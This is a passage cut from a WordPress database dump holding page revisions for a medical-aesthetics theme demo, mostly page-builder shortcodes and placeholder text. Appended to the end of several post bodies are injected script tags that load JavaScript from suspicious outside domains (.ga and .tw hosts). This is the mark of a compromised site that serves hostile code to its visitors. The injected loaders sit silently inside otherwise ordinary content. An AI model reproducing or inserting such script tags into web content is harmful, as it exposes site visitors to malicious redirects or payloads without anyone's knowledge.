fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"3\" order=\"DESC\" orderby=\"date\" posts_per_page=\"3\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-11 00:52:29','2018-01-11 00:52:29','',5,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/5-revision-v1/',0,'revision','',0),(6616,1,'2018-01-11 00:53:03','2018-01-11 00:53:03','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6612\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"3\" order=\"DESC\" orderby=\"date\" posts_per_page=\"3\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-11 00:53:03','2018-01-11 00:53:03','',5,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/5-revision-v1/',0,'revision','',0),(6617,1,'2018-01-11 00:53:18','2018-01-11 00:53:18','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 00:53:18','2018-01-11 00:53:18','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6618,1,'2018-01-11 04:52:41','2018-01-11 04:52:41','<p>[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]</p>\n<h2>Facial Treatment</h2>\n<p>[/vc_column_text][vc_custom_heading][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633262229{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]</p>\n<h4>4D Laser Face Lifting</h4>\n<p>Lorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633293772{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]</p>\n<h4>3D Rejuvenation</h4>\n<p>Lorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633307261{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]</p>\n<h4>Anti Wrinkle Injection</h4>\n<p>Lorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\n<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-autosave-v1','','','2018-01-11 04:52:41','2018-01-11 04:52:41','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-autosave-v1/',0,'revision','',0),(6619,1,'2018-01-11 00:54:55','2018-01-11 00:54:55','<script 